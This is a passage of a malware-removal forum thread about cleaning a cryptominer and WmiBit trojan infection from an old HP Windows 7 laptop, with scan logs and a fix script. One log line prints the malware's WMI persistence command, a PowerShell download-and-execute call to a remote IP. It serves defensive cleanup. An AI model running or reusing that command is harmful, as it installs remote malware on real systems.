Error: (03/29/2022 05:31:53 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Provider Host service which failed to start because of the following error:
The dependency service or group failed to start.
==================== Memory info ===========================
BIOS: Hewlett-Packard F.15 04/07/2011
Motherboard: Hewlett-Packard 1605
Processor: Intel® Celeron® CPU 900 @ 2.20GHz
Percentage of memory in use: 76%
Total physical RAM: 3002.92 MB
Available physical RAM: 718.82 MB
Total Virtual: 6003.98 MB
Available Virtual: 3856.62 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:216.47 GB) (Free:174.26 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.12 GB) (Free:2.28 GB) NTFS ==>[system with boot components (obtained from drive)]
\\?\Volume{8f022f87-fab2-11df-acd0-806e6f6e6963}\ (SYSTEM) (Fixed) (Total:0.19 GB) (Free:0.16 GB) NTFS
\\?\Volume{8f022f8a-fab2-11df-acd0-806e6f6e6963}\ (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 92636A50)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=216.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.1 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)
==================== End of Addition.txt =======================
================================================================================
Overall the systemn is running much better. I'll do a normal boot now and see what happens and reoprt back in a bit.
Thanks for all your help so far.
Edited by Ztruker, 29 March 2022 - 05:58 PM.
Rich
Die with memories, not dreams. – Unknown
#23
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 29 March 2022 - 07:51 PM
Made one more run with MBAM in Safe Mode again. Full scan with rootkit enabled.
Here is the log:
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 3/29/22
Scan Time: 9:07 PM
Log File: c1f71280-afc5-11ec-bba8-60eb6909b7df.json
-Software Information-
Version: 4.5.2.157
Components Version: 1.0.1562
Update Package Version: 1.0.53024
License: Trial
-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Marilyn-HP\Administrator
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 373990
Threats Detected: 26
Threats Quarantined: 0
Time Elapsed: 23 min, 37 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 0
(No malicious items detected)
Module: 0
(No malicious items detected)
Registry Key: 12
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}, No Action By User, 896, 770537, 1.0.53024, , ame, , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka, No Action By User, 896, 770535, , , , , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}, No Action By User, 896, 770535, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C690459B-7A6B-4B99-9F89-0925C173C766}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{C690459B-7A6B-4B99-9F89-0925C173C766}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, No Action By User, 5601, 430785, 1.0.53024, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{13827ABC-39ED-4F6F-AE2B-4BF749C50C40}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{13827ABC-39ED-4F6F-AE2B-4BF749C50C40}, No Action By User, 5601, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, No Action By User, 5601, 430785, 1.0.53024, , ame, , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{62CDBBDB-A881-4E06-B3D1-C7AA7487212B}, No Action By User, 3643, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{62CDBBDB-A881-4E06-B3D1-C7AA7487212B}, No Action By User, 3643, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, No Action By User, 3643, 417162, 1.0.53024, , ame, , ,
Registry Value: 1
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{CCF5BCCE-A79A-49A6-A35F-0E85AFE90D46}|PATH, No Action By User, 896, 770537, 1.0.53024, , ame, , ,
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 1
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET, No Action By User, 3713, 862122, 1.0.53024, , ame, , ,
File: 9
Backdoor.ForShare.WmiBit, C:\WINDOWS\DEBUG\ITEM.DAT, No Action By User, 5820, 430781, 1.0.53024, 2B1C66581342EDE26011C68B, dds, 01704892, BDFA523E5A06C417E30F0DAECB6215F3, 1E8441F0D32D3854E0B3801063F6015A9F09637D77B714F8E58FB8C198693A51
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\OKA, No Action By User, 896, 770535, 1.0.53024, , ame, , 90B48671300C6CB9E665CB4591F3DE78, 2CE1319062C6E170AC2422E1745C85489199F2B763355E2C676F7A36E770688F
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA1, No Action By User, 5601, 430785, , , , , 3C729464934FD3BCA47BF02DE4E49ABA, 44BE98B0751F5F2755062F70E30342F394BB4ACCC00F9F7859E86A94C93242D0
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET\CONFIG.JSON, No Action By User, 3713, 862122, 1.0.53024, , ame, , A1DBFEE625D809262093BE374C2C1F7D, C8559D6211D8115AD1DDC6A460E6A83BC85C2D52A145CB4363FD1F5FF6BE904A
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\lsma22.exe, No Action By User, 3713, 862122, , , , , D6F8C66D27FA8D4172399AFBFBCE6975, BA1E190E87D89FF7943CCA039F357CA8E7C37255D51ACCF49393E2F9119DEC04
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\WinRing0x64.sys, No Action By User, 3713, 862122, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA2, No Action By User, 5601, 430785, , , , , C972DC0E82B1EA613933267F30E670A1, 16645E167BD786F6182B6C3DA9B12A0EA8BBD31F8B5570A9919400B154C7A811
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, No Action By User, 3643, 417162, , , , , 0534D93E002034D230F134A956875C86, F1F6359CBB158DB7387B964513E9EEC1051930B821094FE8C78E3331245CED3B
Trojan.MalPack.UPX, C:\WINDOWS\TEMP\CONHOY.EXE, No Action By User, 7156, 858908, 1.0.53024, EF5058CCC8725A5C802E0BD8, dds, 01704892, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683
Physical Sector: 0
(No malicious items detected)
WMI: 3
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"killmm4\"",Filter="__EventFilter.Name=\"killmm3\"", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:__EventFilter.Name="killmm3", No Action By User, 15642, 868677, , , , , ,
Hijack.Script.WMI, \\MARILYN-HP\ROOT\subscription:CommandLineEventConsumer.Name="killmm4", No Action By User, 15642, 868677, 1.0.53024, , ame, , ,
(end)
Booted normally after this and conhoy.exe was back i C:\Windows\temp.
Edited by Ztruker, 29 March 2022 - 08:14 PM.
Rich
Die with memories, not dreams. – Unknown
#24
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 29 March 2022 - 09:14 PM
Juliet, sent you a PM with some critical info I don't want to post here unless you okay it.
Meantime, I was able to delete 8 to 10 scheduled tasks then boot to Safe mode and delete C:\Windows\Temp\conhoy.exe. Rebooted normally and conhoy.exe was not put back into C:\Windows\Temp. Looks like cleaning up Task Scheduler may have broken the infection loop, that and not having an Internet connection.
Running Malware Bytes again, this time from a normal boot for the first time, to see what it finds. I'll post the log in the morning probably.
Still open to doing a clean install of Windows 10 or 7 if 10 wont install, whatever you think is best.
Edited by Ztruker, 29 March 2022 - 09:14 PM.
Rich
Die with memories, not dreams. – Unknown
#25
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 30 March 2022 - 08:03 AM
Still open to doing a clean install of Windows 10 or 7 if 10 wont install, whatever you think is best.
Might have to but let's see what we can do.
Can you try to run this in normal mode first?
Ask Toolbar Updater <== if still listed remove this from the control panel.
Start Farbar Recovery Scan Tool with Administrator privileges
(Right click on the FRST icon and select Run as administrator, just open it and let it wait)
highlight on the text below and select Copy.
beginning with Start:: and finishing with End::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Start::
CloseProcesses:
SystemRestore:
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe (No File)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (No File)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe (No File)
HKLM-x32\...\Run: [AvgUi] => "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw (No File)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [CCleaner Smart Cleaning] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {1F798407-258E-40E4-88D5-09E365947CCC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe /s /p 1 (No File)
Task: {2B642391-2C6A-419F-A839-4CD0FB785BDE} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe (No File)
Task: {53967A89-F06F-46F1-B3BA-D1A5E6FB8CBD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L Analysis (No File)
Task: {77B2A611-2A8B-4136-9E0A-B69F523C8EA1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=2 (No File)
Task: {88C169BB-B378-4BDD-BF10-DE1BA9564722} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {A4A25E16-BC91-4ACE-9676-11A976F8163C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L TuneupTimer (No File)
Task: {AA8D5163-B71D-4B7E-B7C2-215E15C37B54} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe (No File) <==== ATTENTION
Task: {ADC35D8D-8FD8-4112-A8AE-1873442EF63F} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {B6513C2B-1469-4BB6-9007-29A630203521} - System32\Tasks\HPCustPartic.exe_{BE46DC17-3C77-4163-8B22-E2A235CF8971} => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe /installoptin 1444481912 /installreport yes (No File)
Task: {CD1BAF60-5996-47FD-8F0B-1BFC5643A5BC} - \Mysa2 -> No File <==== ATTENTION
Task: {CEAF0A86-3EE6-4454-8C0D-CD971E6FEF8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=1 (No File)
Task: {DE3295F5-6883-451F-8BD7-F00ACCB8E70C} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe /eu (No File)
Task: {DF5AF517-6345-4C01-9682-5D3B6468BCE8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (No File)
Task: {F094EA7D-B75A-434A-B205-0A3FF27DADDB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe /taskrestart (No File)
Task: {FB7E5A6C-33D5-432D-98AE-AF0F25FE07BD} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7abfca63-0362-4561-bed5-28e417e3aeb4} <==== ATTENTION (Restriction - IP)
S3 ClientAnalyticsService; "C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe" [X]
S4 HomeNetSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 HP Support Assistant Service; "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe" [X]
S4 McBootDelayStartSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McMPFSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McNaiAnn; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McODS; "C:\Program Files\McAfee\VirusScan\mcods.exe" [X]
S4 mcpltsvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McProxy; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 MSK80Service; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
NETSVC: MsF928BDEEApp -> no filepath.
2022-03-29 17:29 - 2022-03-29 17:29 - 000003448 _____ C:\Windows\system32\Tasks\Mysa1
2022-03-29 17:29 - 2022-03-29 17:29 - 000003444 _____ C:\Windows\system32\Tasks\ok
2022-03-29 17:29 - 2022-03-29 17:29 - 000003342 _____ C:\Windows\system32\Tasks\oka
2022-03-28 13:38 - 2012-06-22 10:29 - 000000000 ____D C:\Program Files (x86)\Conduit
C:\Program Files\Common Files\AV
C:\Program Files (x86)\Coupons
ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll -> No File
ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => c:\PROGRA~1\mcafee\msc\MCCTXM~1.DLL -> No File
WMI:subscription\CommandLineEventConsumer->killmm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.r...wershell.exeIEX(New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http:/ (the data entry has 362 more characters).]
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-1004 -> {D2539E59-E453-4A9D-B465-200A7C22E0B5} URL =
SearchScopes: HKU\S-1-5-21-1250379553-2428740185-3603661230-500 -> {C7BEFF53-0739-431F-893F-63670C6CE2F8} URL =
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\PROGRA~2\mcafee\msc\mcsniepl.dll No File
127.0.0.1 kr1s.ru
127.0.0.1 zcop.ru
127.0.0.1 sql.4i7i.com
Hosts:
CMD: netsh int ip reset
CMD: ipconfig /flushDNS
EmptyTemp:
C:\Windows\Temp\*.*
End::
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Start FRST (FRST64) with Administrator privileges
Press the Fix button. FRST will process the lines copied above from the clipboard.
When finished, a log file (Fixlog.txt) will pop up and saved in the same location the tool was ran from.
Please copy and paste its contents in your next reply.
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
Register to Remove
#26
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 30 March 2022 - 08:10 AM
Let's also try this scanner
It's been updated I'm sure since I've used this but I feel sure you can work with the interface and allow it to delete/quarantine what it finds.
RogueKiller
- Download the right version of RogueKiller for your Windows version (32 or 64-bit)
- Once done, move the executable file to your Desktop, right-click on it and select
Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) - Click on the Start Scan button in the right panel, which will bring you to another tab, and click on it again (this time it'll be in the bottom right corner)
- Wait for the scan to complete
- On completion, the results will be displayed
- Check every single entry (threat found), and click on the Remove Selected button
- On completion, the results will be displayed. Click on the Open Report button in the bottom left corner, followed by the Open TXT button (also in the bottom left corner)
- This will open the report in Notepad. Copy/paste its content in your next reply
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#27
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 30 March 2022 - 08:34 AM
Farbar Fixlog.txt:
Rich
Die with memories, not dreams. – Unknown
#28
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 30 March 2022 - 09:08 AM
As soon as I allow the laptop to connect to the internet conhoy.exe is put in C:\Windows\temp and the Task Scheduler entries are added again.
I hate to do it but unless RogueKiller cleans everything it's time to do a Clean Install of Windows 10 if it will run on this old PC or Windows 7 Home Premium otherwise. Not much user data needs to be saved.
Rich
Die with memories, not dreams. – Unknown
#29
-
- Retired Classroom Teacher
-
- 7,686 posts
SuperHelper
- Interests:Boo!....
-
Posted 30 March 2022 - 09:11 AM
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#30
-
- Tech Team
-
- 8,292 posts
WTT Technical Elder
-
Interests:Helping people fix MS Windows related computer problems of all kinds.
Waking each morning to see the green side of the Earth!
Posted 30 March 2022 - 09:45 AM
Still running. 11 threats, 5 PUPs so far. I deleted the scheduled tasks again so after a reboot I'll look at them then connect to the internet and see how long it takes to get reinfected or if that only happens on a reboot.
Edited by Ztruker, 30 March 2022 - 09:46 AM.
Rich
Die with memories, not dreams. – Unknown
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
